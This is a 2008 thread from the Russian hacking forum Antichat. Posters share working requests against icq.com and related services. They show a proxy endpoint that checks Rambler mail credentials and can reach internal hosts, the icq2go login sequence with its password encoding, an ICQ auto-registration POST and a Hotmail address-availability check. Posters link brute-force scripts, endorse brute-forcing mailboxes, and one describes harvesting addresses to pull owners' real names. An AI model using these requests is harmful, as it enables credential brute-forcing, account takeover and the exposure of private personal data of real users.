Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Некоторые баги Icq.com (https://forum.antichat.xyz/showthread.php?t=72388)

КВР 02.06.2008 16:47
Некоторые баги Icq.com
 
К сути вопроса.
[php]
http://id.rambler.ru/script/reg.cgi&username=xspider1@rambler.ru&password=5213 38
[php]
так показывает ошибку 404
PHP код:
https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=http://id.rambler.ru/script/reg.cgi&username=xspider1@rambler.ru&password=521338 
Так запрос выполняется нормально.
если выдаёт 1 то логин пасс верные если нет то 0.
таким образом можно написать брутфорсер.
Скрипт:
PHP код:
https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url= 
является сам по себе вэб прокси сервером.
Те переходя по ссылке https://ips.icq.com/
мы емеем 404.
PHP код:
 https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=https://ips.icq.com 
Всё ок.Нету форбиден.
можно проскалитть локалку
PHP код:
 https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=http://192.168.0.1

и так далее
Можно приинклудить джава скрипт.
PHP код:
https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=УРЛ_С_ДЖАВА_СКРИПТОМ 
Ccылка на исходьник скрипта.
PHP код:
http://webfile.ru/1990419 
Web-defence.ru

КВР 02.06.2008 19:42
вот например красивий запрос
PHP код:
https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=http://localhost 


недавно розберал авторизацию на icq2go
то
после просмотра старого и доброго webicq я нашел метод авторизацеи
суть ево полягает в том что для начала мы берем сесию вот отсюда
PHP код:
http://bhm.icq.com/hello?locale=en&clver=8003&clid=Wicked%5FTester&trans=1001&event=1500&%5F%5FiClient=%5Bobject%20Object%5D 
и получаем в ответ event=1510&session=2021799010%2dc754d546%2d2a05%2d 4e44%2d89df%2ddeae33557a14&trans=1001&server=64%2e 12%2e202%2e137&port=80&?

2021799010%2dc754d546%2d2a05%2d4e44%2d89df%2ddeae3 3557a14- самая сесия
64.12.202.137 - адрес сервера

и когда мы узнали нашу сесию делаем запрос
PHP код:
http://64.12.202.137/data?session=2021799010%2dc754d546%2d2a05%2d4e44%2d89df%2ddeae33557a14&isicqemail=0&pass=DEDHFKDIHCFDGFHI&enc=1&status=0&sn=489801534&trans=1001&event=2000&%5F%5FiClient=%5Bobject%20Object%5D 
обратите внимания на пароль!
пароль шифруеться, 1 символ заменяеться на 2
в файле char я привел почти все символи етой шифровкой !

если ответ мы получаем
PHP код:
event=2010&session=2021799010%2dc754d546%2d2a05%2d4e44%2d89df%2ddeae33557a14&trans=1001&skey=713969121&sn=489801534&epass=1EGEJGMEKIEGFHHIK&? 
значит пароль подошел
PHP код:
event=2010 означает что пароль удачный
event=1000 неправельный пароль 

satana8920 02.06.2008 19:52
ChaaK мдяяяя
а вот еси я айсику брутер хочу написать вот для таких как ты блин?
что б проверялись парлли по HTTP

КВР 02.06.2008 20:04
Хоть кто-то понял тему.

heks 04.06.2008 18:29
302 ошибка
 
Цитата:
Сообщение от ChaaK
И к чему это??
Простые методы узнавания правильный ли пароль. Нету тут багов, по крайней мере не встретилось.

А чо 302 ошибка уже не в моде?
опиши что за 302 ошибка

Piflit 04.06.2008 18:50
http://www.checkupdown.com/status/E302.html

maxster 04.06.2008 19:18
набрасал на скорую руку скрипт для брута мыльников, через первую багу, если кому надо берите
http://dump.ru/file_catalog/417927

devton 05.06.2008 20:04
бага шЫкарная
брут рамблер мыл с малым трафиком - штука крайне полезная

НО есть еще 1 применение первому урлу(https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=http://id.rambler.ru/script/reg.cgi&username=xspider1@rambler.ru&password=5213 38 )

открываем в бровзере и видим введенные при регистрации мыльника фамилию и имя владельца рамблер-мыла

я ввел в гугле mailto "@rambler." , проверил мыльники етим скриптом. Похоже, народ указывает в значительной части случаев реальные имя-фамилию :)

КВР 09.06.2008 14:56
Возможность "Авто-рега" icq номеров.
Код:
http://icq.atlas.cz/ClientRegistration/default.aspx?connectorId=_icqFlashConnector&validateAtlasUser=1
пост даные
PHP код:
uin=365286171&key=B800E649B65799290C6033C4BDF566FF13B2ECE3CFE9A6CC9894A243B7E3D27328EE6C733AFC0CC520BB63F2A2F3B5F69CE298085E0EC2630EBB64F30009B46F98CD9FB976F6108797E5C5379824360CD653D1821270739CF55DFA9D094E9F8D&password=a8n5xz&data=%3Cdata%3E%3Cfname%3E%3C%2Ffname%3E%3Clname%3E%3C%2Flname%3E%3CbYear%3E0%3C%2FbYear%3E%3CbMonth%3E0%3C%2FbMonth%3E%3CbDay%3E0%3C%2FbDay%3E%3Cgender%3E0%3C%2Fgender%3E%3Ccountry%3E-1%3C%2Fcountry%3E%3Ccity%3E%3C%2Fcity%3E%3Cstate%3E%3C%2Fstate%3E%3Ckey%3EB800E649B65799290C6033C4BDF566FF13B2ECE3CFE9A6CC9894A243B7E3D27328EE6C733AFC0CC520BB63F2A2F3B5F69CE298085E0EC2630EBB64F30009B46F98CD9FB976F6108797E5C5379824360CD653D1821270739CF55DFA9D094E9F8D%3C%2Fkey%3E%3Cuin%3E365286171%3C%2Fuin%3E%3Cpassword%3Ea8n5xz%3C%2Fpassword%3E%3Cemail%3E%3C%2Femail%3E%3Cnickname%3Exspider3%3C%2Fnickname%3E%3Cquestion%3EN%C3%A1zev+obl%C3%ADben%C3%A9+po%C4%8D%C3%ADta%C4%8Dov%C3%A9+hry%3F%3C%2Fquestion%3E%3Canswer%3Exspider+fghfgjhhg%3C%2Fanswer%3E%3CauthorizeAdd%3E%3C%2FauthorizeAdd%3E%3CauthorizeStatus%3E1%3C%2FauthorizeStatus%3E%3CrememberPass%3E1%3C%2FrememberPass%3E%3C%2Fdata%3E&username=<login
нотмаил.ком чек на свободные мыла
Код:
https://signup.live.com/nexus.fpp?cnmn=Microsoft.Msn.MemberExperience.Nexus.NexusService.CheckAvailability&ptid=0&a=f9869bdc-a627-4a1e-8c06-f0f1b88923cf
PHP код:
[color=green]пост запрос[/color]
cn=Microsoft.Msn.MemberExperience.Nexus.NexusService&mn=CheckAvailability&d=[%22<login>%40<domain>%22],%22f9869bdc-a627-4a1e-8c06-f0f1b88923cf%22&v=

если ответ 1006 знач мыло свободное


Web-Defence.ru


Время: 07:41